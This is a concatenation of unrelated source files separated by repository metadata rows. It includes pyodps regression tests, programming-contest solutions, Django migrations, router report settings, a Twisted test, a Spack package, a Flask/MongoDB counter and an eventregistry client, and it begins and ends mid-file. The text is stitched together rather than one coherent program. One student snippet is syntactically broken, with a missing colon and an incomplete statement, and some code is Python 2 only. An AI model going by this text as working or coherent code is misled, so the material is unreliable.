RIDGE_OUT_TABLE = tn('pyodps_test_ridge_out')
MODEL_NAME = tn('pyodps_test_out_model')
class TestMLRegression(MLTestBase):
def setUp(self):
super(TestMLRegression, self).setUp()
self.create_ionosphere(IONOSPHERE_TABLE)
options.runner.dry_run = True
def test_mock_xgboost(self):
df = DataFrame(self.odps.get_table(IONOSPHERE_TABLE)).roles(label='class')
splited = df.split(0.6)
xgboost = Xgboost()
model = xgboost.train(splited[0])._add_case(self.gen_check_params_case({
'labelColName': 'class', 'modelName': MODEL_NAME, 'colsample_bytree': '1', 'silent': '1',
'eval_metric': 'error', 'eta': '0.3', 'inputTableName': TEMP_TABLE_PREFIX + '0_split_2_1', 'max_delta_step': '0',
'base_score': '0.5', 'seed': '0', 'min_child_weight': '1', 'objective': 'reg:linear',
'featureColNames': ','.join('a%02d' % i for i in range(1, 35)),
'max_depth': '6', 'gamma': '0', 'booster': 'gbtree'}))
model.persist(MODEL_NAME)
predicted = model.predict(splited[1])._add_case(self.gen_check_params_case({
'modelName': MODEL_NAME, 'appendColNames': ','.join('a%02d' % i for i in range(1, 35)) + ',class',
'outputTableName': XGBOOST_OUT_TABLE, 'inputTableName': TEMP_TABLE_PREFIX + '0_split_2_2'}))
# persist is an operational node which will trigger execution of the flow
predicted.persist(XGBOOST_OUT_TABLE)
def test_mock_gbdt(self):
df = DataFrame(self.odps.get_table(IONOSPHERE_TABLE)).roles(label='class')
splited = df.split(0.6)
gbdt = GBDT(min_leaf_sample_count=10)
model = gbdt.train(splited[0])._add_case(self.gen_check_params_case({
'tau': '0.6', 'modelName': MODEL_NAME, 'inputTableName': TEMP_TABLE_PREFIX + '0_split_2_1', 'maxLeafCount': '32',
'shrinkage': '0.05', 'featureSplitValueMaxSize': '500', 'featureRatio': '0.6', 'testRatio': '0.0',
'newtonStep': '0', 'randSeed': '0', 'sampleRatio': '0.6', 'p': '1', 'treeCount': '500', 'metricType': '2',
'labelColName': 'class', 'featureColNames': ','.join('a%02d' % i for i in range(1, 35)),
'minLeafSampleCount': '10', 'lossType': '3', 'maxDepth': '11'}))
model.persist(MODEL_NAME)
predicted = model.predict(splited[1])._add_case(self.gen_check_params_case({
'modelName': MODEL_NAME, 'appendColNames': ','.join('a%02d' % i for i in range(1, 35)) + ',class',
'outputTableName': GBDT_OUT_TABLE, 'inputTableName': TEMP_TABLE_PREFIX + '0_split_2_2'}))
# persist is an operational node which will trigger execution of the flow
predicted.persist(GBDT_OUT_TABLE)
@ci_skip_case
def test_linear(self):
options.runner.dry_run = False
self.delete_table(LINEAR_REGRESSION_OUT_TABLE)
self.delete_offline_model(MODEL_NAME)
df = DataFrame(self.odps.get_table(IONOSPHERE_TABLE)).roles(label='class')
splited = df.split(0.6)
algo = LinearRegression()
model = algo.train(splited[0])
model.persist(MODEL_NAME)
logging.info('Importance: ', regression_importance(splited[1], model))
predicted = model.predict(splited[1])
# persist is an operational node which will trigger execution of the flow
predicted.persist(LINEAR_REGRESSION_OUT_TABLE)
logging.info('MSE: ', mean_squared_error(predicted, 'class'))
logging.info('MAE: ', mean_absolute_error(predicted, 'class'))
logging.info('HIST: ', residual_histogram(predicted, 'class'))
logging.info('MSE: ', pearson(predicted, col1='class'))
|
[
"xuye.qin@alibaba-inc.com"
] |
xuye.qin@alibaba-inc.com
|
560210583dcd9e410b9a6d3ce7eccb94b910daaf
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_1_neat/16_0_1_ashuwp_A.py
|
2b4922b913d674d05b48e7ff31fca4b01cb5237e
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 441
|
py
|
def sheep(num):
if num == 0:
return "INSOMNIA"
itr = tr = 0
while tr != 1023:
cnt = 0
itr += 1
temp = str(num * itr)
for k in temp:
cnt |= 1 << int(k)
tr |= cnt
return num * itr
if __name__ == "__main__":
tc = int(input())
for i in range(tc):
n = int(input())
print("Case #{}: {}".format(i + 1, sheep(n)))
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
3aa435659cdd66419cc6a2c5579e721ad5ecf45d
|
4b3ae6048ced0d7f88a585af29fa3a7b15005749
|
/Python/Django/AJAX/user_login/apps/orm_app/migrations/0001_initial.py
|
fed103cb60fdb32297924849629a3e26c80f3a0a
|
[] |
no_license
|
ajag408/DojoAssignments
|
a6320856466ac21d38e8387bdcbbe2a02009e418
|
03baa0ff5261aee6ffedf724657b3a8c7cdffe47
|
refs/heads/master
| 2022-12-11T15:50:46.839881
| 2021-06-07T20:57:17
| 2021-06-07T20:57:17
| 79,872,914
| 0
| 0
| null | 2022-12-08T00:35:09
| 2017-01-24T02:58:15
|
Python
|
UTF-8
|
Python
| false
| false
| 877
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-07-25 03:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('email_address', models.CharField(max_length=255)),
('age', models.IntegerField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"akashjagannathan408@gmail.com"
] |
akashjagannathan408@gmail.com
|
a8785d9e209ad0d74353f91f65a34d7c4e5ab111
|
3e45ea5b84fdce1d1c391929e6e95c5ecbfdbf98
|
/day03/app03_1/migrations/0005_animal_cat_dog.py
|
293a57087d20852f2a63c1505c8803080066aa6e
|
[
"Apache-2.0"
] |
permissive
|
General-Coder/Django-Introduction
|
3cc75bc2098a0f90769d375aeee8f999a4f6fcc6
|
e88b12682f9abc46a90a0fc79e7443537230a506
|
refs/heads/master
| 2020-04-05T07:34:44.540644
| 2018-11-11T14:30:12
| 2018-11-11T14:30:12
| 156,681,232
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,630
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-10-24 16:46
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app03_1', '0004_teacher_xz'),
]
operations = [
migrations.CreateModel(
name='Animal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('color', models.CharField(max_length=30)),
('gender', models.CharField(max_length=30)),
('age', models.IntegerField()),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Cat',
fields=[
('animal_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='app03_1.Animal')),
('type', models.CharField(max_length=20)),
],
bases=('app03_1.animal',),
),
migrations.CreateModel(
name='Dog',
fields=[
('animal_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='app03_1.Animal')),
('size', models.CharField(max_length=20)),
],
bases=('app03_1.animal',),
),
]
|
[
"17625904460@163.com"
] |
17625904460@163.com
|
dff4df7f2b57a2ea5b48b4b41f6928afa2de7294
|
3a9f2b3d79cf214704829427ee280f4b49dca70a
|
/saigon/rat/u/fm/_report_mgmt_cfg.py
|
031da9c2287b3c40022bf4816bc7505478d10035
|
[] |
no_license
|
jichunwei/MyGitHub-1
|
ae0c1461fe0a337ef459da7c0d24d4cf8d4a4791
|
f826fc89a030c6c4e08052d2d43af0b1b4b410e3
|
refs/heads/master
| 2021-01-21T10:19:22.900905
| 2016-08-20T03:34:52
| 2016-08-20T03:34:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,184
|
py
|
'''
This tea to work with Reports page.
1. Reports foundation development
+ to cover those pages: Device View, Active Firmware, Historical
Connectivity, Association, Provision, Events, Speed Flex
+ to provide basic report activities:
+ fill in report options (inc. filters)
+ generate the report
+ get the report results
+ unsupported features: save reports, export reports
Examples to generate report:
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=dv_report_zd_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=dv_report_ap_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=connectivity_report_zd_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=connectivity_report_ap_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=provision_report_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=events_report_params
tea.py u.fm.report_mgmt fm_ip=192.168.20.252 action=generate report_param=speed_flex_report_params
Examples to create report:
Example for report option and filter options
save_cfg = dict(include_filter = True, # False
include_header = True, # False
schedule = True, # False
frequency = 'Weekly', # | 'Weekly' | 'Monthly',
day_of_week = 'Monday',
time_of_day = '3:00', # '2:00', '3:00', ...
am_pm = 'PM', # 'PM'
email_report = 'admin@ruckus.com',
)
advance_cfg = dict(include_filter = True, # False
include_header = True, # False
schedule = True, # False
frequency = 'Monthly', # | 'Weekly' | 'Monthly',
day_of_month = 1,
time_of_day = '3:00', # '2:00', '3:00', ...
am_pm = 'AM', # 'PM'
email_report = 'admin@ruckus.com',
)
'''
import copy
#-------------------------------------------------------------------------------
# It is too long to write these params and their values on command line.
# So define them here for generating/creating reports.
general_save_cfg = dict(
include_filter = True,
include_header = True,
time_of_day = '6:00', # '2:00', '3:00', ...
am_pm = 'AM', # 'PM'
email_report = 'admin@ruckus.com',
)
save_cfg_daily_type = dict(
schedule = True,
frequency = 'Daily', # | 'Weekly' | 'Monthly',
)
save_cfg_daily_type.update(general_save_cfg)
save_cfg_weekly_type = dict(
schedule = True, # False
frequency = 'Weekly', # | 'Weekly' | 'Monthly',
day_of_week = 'Monday',
)
save_cfg_weekly_type.update(general_save_cfg)
save_cfg_monthly_type = dict(
schedule = True, # False
frequency = 'Monthly', # | 'Weekly' | 'Monthly',
day_of_month = 1,
)
save_cfg_monthly_type.update(general_save_cfg)
################################################################################
# NOTE: Currently cannot generate/create report with filters "Model Name" and
# "Connection". Bug: 15203
################################################################################
#1. params to generate a report and get it result from Report Categories
dv_report_zd_params = dict(
#action = 'generate',
report_type = 'device_view',
get_result = True,
report_options = [
'All ZoneDirectors', 'ZoneDirectors',
],
filter_options = [
['ZoneDirector Name', 'Contains', 'Ruckus'],
['Version', 'Contains', '9.0']
],
save_cfg = save_cfg_daily_type,
)
# params to create/generate zd Device View report from Saved Reports
manage_dv_report_zd_params = copy.deepcopy(dv_report_zd_params)
manage_dv_report_zd_params.update(
report_options = [
'Device View', 'All ZoneDirectors', 'ZoneDirectors',
],
)
dv_report_ap_params = dict(
#action = 'generate',
report_type = 'device_view',
get_result = True,
report_options = [
'All Standalone APs', 'Currently Connected',
],
filter_options = [
['Device Name', 'Contains', 'Ruckus'],
['Uptime', 'Greater than', '1', 'Hours']
],
save_cfg = save_cfg_weekly_type,
)
# params to create/generate ap Device View report from Saved Reports
manage_dv_report_ap_params = copy.deepcopy(dv_report_ap_params)
manage_dv_report_ap_params.update(
report_options = [
'Device View', 'All Standalone APs', 'Currently Connected',
],
)
connectivity_report_zd_params = dict(
#action = 'generate',
report_type = 'connectivity',
get_result = True,
report_options = [
'All ZoneDirectors', 'Disconnected ZoneDirectors', # 'Connected ZoneDirectors',
],
filter_options = [
['Device Last Seen', 'Earlier than', '2010-07-26', '06:00:00 AM'],
],
save_cfg = save_cfg_monthly_type,
)
manage_connectivity_report_zd_params = copy.deepcopy(connectivity_report_zd_params)
manage_connectivity_report_zd_params.update(
report_options = [
'Historical Connectivity', 'All ZoneDirectors', 'Disconnected ZoneDirectors',
],
)
connectivity_report_ap_params = dict(
#action = 'generate',
report_type = 'connectivity',
get_result = True,
report_options = [
'All Standalone APs', 'Connected',
],
filter_options = [
['Uptime', 'Greater than', 5, 'Hours'],
['Software', 'Contains', '9.0']
],
save_cfg = save_cfg_daily_type,
)
manage_connectivity_report_ap_params = copy.deepcopy(connectivity_report_ap_params)
manage_connectivity_report_ap_params.update(
report_options = [
'Historical Connectivity', 'All Standalone APs', 'Connected',
],
)
# report params for Provision report
provision_report_params = dict(
#action = 'generate',
report_type = 'provision',
get_result = True,
report_options = [
'Configuration Upgrade',
],
filter_options = [
['Created by', 'Starts with', 'admin'],
],
save_cfg = save_cfg_weekly_type,
)
manage_provision_report_params = copy.deepcopy(provision_report_params)
manage_provision_report_params.update(
report_options = [
'Provision', 'Configuration Upgrade',
],
)
# report params for Events report
events_report_params = dict(
#action = 'generate',
report_type = 'events',
get_result = True,
report_options = [
'Events', 'Standalone APs',
'Value changed due to configuration request'
],
filter_options = [
['IP Address', 'Starts with', '192.168']
],
save_cfg = save_cfg_monthly_type,
)
manage_events_report_params = copy.deepcopy(events_report_params)
manage_events_report_params.update(
report_options = [
'Events', 'Events', 'Standalone APs',
'Value changed due to configuration request'
],
)
# report params for Speed Flex report
speed_flex_report_params = dict(
#action = 'generate',
report_type = 'speed_flex',
get_result = True,
report_options = None,
filter_options = [
['Executor', 'Starts with', 'admin']
],
save_cfg = save_cfg_daily_type,
)
manage_speed_flex_report_params = copy.deepcopy(speed_flex_report_params)
manage_speed_flex_report_params.update(
report_options = [
'Speed Flex',
],
)
|
[
"tan@xx.com"
] |
tan@xx.com
|
96aa5a1461e19e2949d8c3ae4a84b8a9c7751ff7
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02255/s769034459.py
|
6f0767f2d12bd0d4ef95fa9cd88e9316da5284d9
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 587
|
py
|
import sys
def insert_sort(array):
for i in range(0, len(array)):
v = array[i]
j = i - 1
while (j >= 0) and (array[j] > v):
array[j + 1] = array[j]
j -= 1
array[j + 1] = v
print print_list(array)
return array
def print_list(array):
s = ""
for n in array:
s += str(n) + " "
s = s.strip()
return s
if __name__ == "__main__":
array_num = int(sys.stdin.readline().strip())
array = map(lambda x: int(x), list(sys.stdin.readline().strip().split(" ")))
array = insert_sort(array)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
9621f6de9e603b381c794751a9e39256ceb86e62
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_intermarrying.py
|
448779925828137d3486fd5f49c4d3a4f0523579
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
#calss header
class _INTERMARRYING():
def __init__(self,):
self.name = "INTERMARRYING"
self.definitions = intermarry
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['intermarry']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
f3d200f5ad3c364311c5a8d6f245b9b7602b099e
|
31009efe0b3882551f03dcaa9c71756c7c6f6ede
|
/src/main/resources/twisted/test/stdio_test_loseconn.py
|
7f95a016b4a41e7ef1c45723dd2ebd0778ee341e
|
[
"Apache-2.0",
"ZPL-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
riyafa/autobahntestsuite-maven-plugin
|
b533433c75f7daea2757158de54c6d80d304a962
|
737e6dad2d3ef794f30f0a2013a77e28decd2ec4
|
refs/heads/master
| 2020-08-16T13:31:39.349124
| 2019-10-16T09:20:55
| 2019-10-16T09:20:55
| 215,506,990
| 0
| 0
|
Apache-2.0
| 2019-10-16T09:18:34
| 2019-10-16T09:18:34
| null |
UTF-8
|
Python
| false
| false
| 1,514
|
py
|
# -*- test-case-name: twisted.test.test_stdio.StandardInputOutputTestCase.test_loseConnection -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Main program for the child process run by
L{twisted.test.test_stdio.StandardInputOutputTestCase.test_loseConnection} to
test that ITransport.loseConnection() works for process transports.
"""
import sys, _preamble
from twisted.internet.error import ConnectionDone
from twisted.internet import stdio, protocol
from twisted.python import reflect, log
class LoseConnChild(protocol.Protocol):
exitCode = 0
def connectionMade(self):
self.transport.loseConnection()
def connectionLost(self, reason):
"""
Check that C{reason} is a L{Failure} wrapping a L{ConnectionDone}
instance and stop the reactor. If C{reason} is wrong for some reason,
log something about that in C{self.errorLogFile} and make sure the
process exits with a non-zero status.
"""
try:
try:
reason.trap(ConnectionDone)
except:
log.err(None, "Problem with reason passed to connectionLost")
self.exitCode = 1
finally:
reactor.stop()
if __name__ == '__main__':
reflect.namedAny(sys.argv[1]).install()
log.startLogging(file(sys.argv[2], 'w'))
from twisted.internet import reactor
protocol = LoseConnChild()
stdio.StandardIO(protocol)
reactor.run()
sys.exit(protocol.exitCode)
|
[
"nmaurer@redhat.com"
] |
nmaurer@redhat.com
|
3453ef9fb376dd038b165acdf01d35326cba96a5
|
ae8590dc2dd0dd6530868ccd52702d06e5d96fa1
|
/copy of source code.py
|
b5a8ca45a3da63b6f0813916fd6af3bbdc1b8dd5
|
[] |
no_license
|
abhisek08/Python-Basics-Part-1-
|
e3bec8e4d7f9e484c4bcade7763842334c93f4b0
|
3687dd6ebb01f2289b3fa226cea28b564894a68f
|
refs/heads/master
| 2022-09-08T11:42:28.871012
| 2020-05-25T07:58:01
| 2020-05-25T07:58:01
| 266,717,854
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
'''
Write a Python program to create a copy of its own source code.
'''
print()
print((lambda str='print(lambda str=%r: (str %% str))()': (str % str))())
print()
|
[
"abhisek.bhunia08@gmail.com"
] |
abhisek.bhunia08@gmail.com
|
6271957d52b5f94a002352d4446b733e556860f3
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03060/s903224060.py
|
f50e8567bb440e68db273f2b40d0b0d865cac43a
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 461
|
py
|
import sys
sys.setrecursionlimit(10**6)
n = int(input())
v = list(map(int, input().split()))
c = list(map(int, input().split()))
#n, m = map(int, input().split())
#s = input()
#s,t = input().split()
#a = [int(input()) for _ in range(n)]
#
#readline = sys.stdin.readline
#n,m = [int(i) for i in readline().split()]
#ab = [[int(i) for i in readline().split()] for _ in range(n)]
ans = 0
for i,j in zip(v,c):
if i > j:
ans += i-j
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
2558d70cd897e6f36debd3e0e01e05c3f02cf98a
|
5b9b1139848db270f5987d4d539c39a30115e87b
|
/solutions/inod.py
|
be970934ef14c54ddf4e4fd8782a9c1426f94dc3
|
[] |
no_license
|
mady1258/Bioinformatics_Stronghold
|
3d0f82b3cff0066246eb6641368a4ea4fe366362
|
6c7daf1ea92b2a74657c9ce40a19d356177d983e
|
refs/heads/master
| 2023-02-04T14:00:54.985085
| 2020-12-23T11:32:03
| 2020-12-23T11:32:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 390
|
py
|
import sys
if __name__ == "__main__":
'''
Given: A positive integer n (3≤n≤10000).
Return: The number of internal nodes of any unrooted binary tree having n leaves.
'''
n = int(sys.stdin.readline().rstrip())
# An unrooted tree with n leaves and m internal nodes should have n + 3m total degrees.
# (n + 3m) / 2 = n + m - 1
# m = n - 2
print(n - 2)
|
[
"egeulgen@gmail.com"
] |
egeulgen@gmail.com
|
533f6ecce51b82f53b872fc88c7b8e9ebcf7864b
|
fb2cc597f319380d228fc15c4008760a82203687
|
/var/spack/repos/builtin/packages/e3sm-kernels/package.py
|
2e8534ee60c1371305fb8b850092d450a78a511f
|
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"LGPL-2.1-only"
] |
permissive
|
JayjeetAtGithub/spack
|
c41b5debcbe139abb2eab626210505b7f930d637
|
6c2df00443a2cd092446c7d84431ae37e64e4296
|
refs/heads/develop
| 2023-03-21T02:35:58.391230
| 2022-10-08T22:57:45
| 2022-10-08T22:57:45
| 205,764,532
| 0
| 0
|
MIT
| 2019-09-02T02:44:48
| 2019-09-02T02:44:47
| null |
UTF-8
|
Python
| false
| false
| 1,887
|
py
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack.package import *
class E3smKernels(MakefilePackage):
"""
Climate kernels for Co-design that originate from the Energy
Exascale Earth System Model (E3SM).
"""
homepage = "https://github.com/e3SM-Project/codesign-kernels"
url = "https://github.com/E3SM-Project/codesign-kernels/archive/refs/tags/v1.0.tar.gz"
git = "https://github.com/E3SM-Project/codesign-kernels.git"
maintainers = ["sarats", "philipwjones"]
version("master", branch="master")
version("1.0", sha256="358249785ba9f95616feecbb6f37f7694646568499c11b2094c9233999c6cc95")
variant(
"kernel",
default="atmosphere",
values=(
"atmosphere",
"mmf-mpdata-tracer",
),
description="Specify E3SM Kernel to Build",
multi=False,
)
@property
def build_directory(self):
return self.spec.variants["kernel"].value
@property
def build_targets(self):
# Spack will provide optimization flags
# But we still need to pass in fortran flags for gfortran
args = []
# Test for gfortran specifically due to hybrid compilers like llvm
if "gfortran" in self.compiler.fc:
args.append("FFLAGS=-ffree-line-length-none")
return args
def install(self, spec, prefix):
# Manually copy binaries over
mkdir(prefix.bin)
if self.spec.variants["kernel"].value == "atmosphere":
install(os.path.join("atmosphere", "atm"), prefix.bin.atm)
elif self.spec.variants["kernel"].value == "mmf-mpdata-tracer":
install(os.path.join("mmf-mpdata-tracer", "advect"), prefix.bin.advect)
|
[
"noreply@github.com"
] |
JayjeetAtGithub.noreply@github.com
|
d8534409bd889016971a612a14dde9520fab2066
|
255e19ddc1bcde0d3d4fe70e01cec9bb724979c9
|
/all-gists/3491924/snippet.py
|
206562a28b41564df1d60ab42576e7b4bb1dd96a
|
[
"MIT"
] |
permissive
|
gistable/gistable
|
26c1e909928ec463026811f69b61619b62f14721
|
665d39a2bd82543d5196555f0801ef8fd4a3ee48
|
refs/heads/master
| 2023-02-17T21:33:55.558398
| 2023-02-11T18:20:10
| 2023-02-11T18:20:10
| 119,861,038
| 76
| 19
| null | 2020-07-26T03:14:55
| 2018-02-01T16:19:24
|
Python
|
UTF-8
|
Python
| false
| false
| 860
|
py
|
import os
from urlparse import urlparse
from flask import Flask
from pymongo import MongoClient
MONGO_URL = os.environ.get('MONGOHQ_URL')
if MONGO_URL:
# Get client
client = MongoClient(MONGO_URL)
# Get database
db = client[urlparse(MONGO_URL).path[1:]]
else:
# Not on an app with the MongoHQ add-on, do some localhost action
client = MongoClient('localhost', 27017)
db = client['MyDB']
app = Flask(__name__)
app.debug = True
@app.route('/')
def hello():
myObj = db.analytics.find_one({'event':'page_views'})
if not myObj:
myObj = {'event':'page_views', 'count':1}
else:
myObj['count'] += 1
db.analytics.save(myObj)
return 'Hello World! ' + str(myObj['count'])
if __name__ == '__main__':
# Bind to PORT if defined, otherwise default to 5000.
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port)
|
[
"gistshub@gmail.com"
] |
gistshub@gmail.com
|
7eae6423802f038e65f587ba7edb68bb345f425b
|
7a7a0663efd2c25adf26f6552e3c4e95e9ac4e63
|
/holon/models/rmm.py
|
b27372b02be9352ffcb461a93b9dea68933d012b
|
[] |
no_license
|
smizell/holon
|
2c5654094cb007a9fceae621630126d9173c4f2c
|
9cdf39b74cee31ed9c84c94b792814f0b9fc6483
|
refs/heads/main
| 2023-02-03T15:46:41.059117
| 2020-12-09T23:10:39
| 2020-12-09T23:10:39
| 317,355,430
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 572
|
py
|
from holon.principles import Principle
level0 = Principle(
name="RMM Level 0",
reference="https://martinfowler.com/articles/richardsonMaturityModel.html#level0",
)
level1 = Principle(
name="RMM Level 1",
reference="https://martinfowler.com/articles/richardsonMaturityModel.html#level1",
)
level2 = Principle(
name="RMM Level 2",
reference="https://martinfowler.com/articles/richardsonMaturityModel.html#level2",
)
level3 = Principle(
name="RMM Level 3",
reference="https://martinfowler.com/articles/richardsonMaturityModel.html#level3",
)
|
[
"smizell@gmail.com"
] |
smizell@gmail.com
|
284fb1b51ef430201f817392977842c1cd80a739
|
49f61714a6f78d984fd2194d6064d84e891bc5b7
|
/2019-1/231/users/4237/codes/1796_1613.py
|
34c1d6c7aa6950bb644b8a059a48fc732ab82aae
|
[] |
no_license
|
psbarros/Variaveis3
|
b5c4e1517e7d94a846ee03791d25d5821a1c651c
|
3dcf6f810709ce03c78335acf9533e008a2ae125
|
refs/heads/master
| 2023-06-13T07:05:00.878430
| 2021-07-06T17:51:37
| 2021-07-06T17:51:37
| 383,549,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
py
|
from numpy import*
vet = input("Digite a atividade fisica ai: ")
tempo = array(eval(input("E o tempo: ")))
i = 0
if(vet == 'ALONGAMENTO'):
total = 3*tempo
i = i + 1
elif(vet == 'CORRIDA')
total
|
[
"psb@icomp.ufam.edu.br"
] |
psb@icomp.ufam.edu.br
|
175287ff552e87d65033887d77371e0b868bf754
|
11ad22552bf6719214239a95d032f5559bf57dc5
|
/eventregistry/QueryStory.py
|
c139a651db188cdf76bd89d15031f14e17ff796f
|
[
"MIT"
] |
permissive
|
arunkumar6545/event-registry-python
|
803914d00a1ce6dda40a1673debac75222b0614e
|
2ccff7799a03f71189ed666f25f3eb673c1a8263
|
refs/heads/master
| 2020-09-10T15:46:57.804243
| 2019-11-16T16:57:06
| 2019-11-16T16:57:06
| 221,745,070
| 0
| 0
|
MIT
| 2019-11-14T16:52:00
| 2019-11-14T16:51:59
| null |
UTF-8
|
Python
| false
| false
| 6,706
|
py
|
from eventregistry.Base import *
from eventregistry.ReturnInfo import *
class QueryStory(Query):
"""
Class for obtaining available info for one or more stories (clusters) in the Event Registry
NOTE: Story in our terminology is a cluster of articles (and not a single article). An event is
then something that consists of one or more stories (typically in different languages).
@param storyUriOrList: a single story uri or a list of story uris
"""
def __init__(self, storyUriOrList = None):
super(QueryStory, self).__init__()
self._setVal("action", "getStory")
if storyUriOrList != None:
self.queryByUri(storyUriOrList)
def _getPath(self):
return "/api/v1/story"
def queryByUri(self, uriOrUriList):
"""search stories by their uri(s)"""
self._setVal("storyUri", uriOrUriList)
def setRequestedResult(self, requestStory):
"""
Set the single result type that you would like to be returned. If some other request type was previously set, it will be overwritten.
Result types can be the classes that extend RequestStory base class (see classes below).
"""
assert isinstance(requestStory, RequestStory), "QueryStory class can only accept result requests that are of type RequestStory"
self.resultTypeList = [requestStory]
class RequestStory:
def __init__(self):
self.resultType = None
def getResultType(self):
return self.resultType
class RequestStoryInfo(RequestStory):
"""
return details about a story
"""
def __init__(self, returnInfo = ReturnInfo()):
self.resultType = "info"
self.__dict__.update(returnInfo.getParams("info"))
class RequestStoryArticles(RequestStory):
"""
return articles about the story
"""
def __init__(self,
page = 1,
count = 100,
sortBy = "cosSim", sortByAsc = False,
returnInfo = ReturnInfo(articleInfo = ArticleInfoFlags(bodyLen = 200))):
"""
return articles in the story (cluster)
@param page: page of the articles to return (1, 2, ...)
@param count: number of articles to return per page (at most 100)
@param sortBy: order in which articles are sorted. Options: id (internal id), date (published date), cosSim (closeness to event centroid), sourceImportanceRank (importance of the news source, custom set), sourceAlexaGlobalRank (global rank of the news source), sourceAlexaCountryRank (country rank of the news source), socialScore (total shares in social media)
@param sortByAsc: should the articles be sorted in ascending order (True) or descending (False) based on sortBy value
@param returnInfo: what details should be included in the returned information
"""
assert page >= 1, "page has to be >= 1"
assert count <= 100
self.resultType = "articles"
self.articlesPage = page
self.articlesCount = count
self.articlesSortBy = sortBy
self.articlesSortByAsc = sortByAsc
self.__dict__.update(returnInfo.getParams("articles"))
class RequestStoryArticleUris(RequestStory):
"""
return a list of article uris
"""
def __init__(self,
sortBy = "cosSim", sortByAsc = False # order in which story articles are sorted. Options: id (internal id), date (published date), cosSim (closeness to story centroid), socialScore (total shares in social media), facebookShares (shares on fb), twitterShares (shares on twitter)
):
"""
return articles in the story (cluster)
@param sortBy: order in which articles are sorted. Options: id (internal id), date (published date), cosSim (closeness to event centroid), sourceImportanceRank (importance of the news source, custom set), sourceAlexaGlobalRank (global rank of the news source), sourceAlexaCountryRank (country rank of the news source), socialScore (total shares in social media)
@param sortByAsc: should the articles be sorted in ascending order (True) or descending (False) based on sortBy value
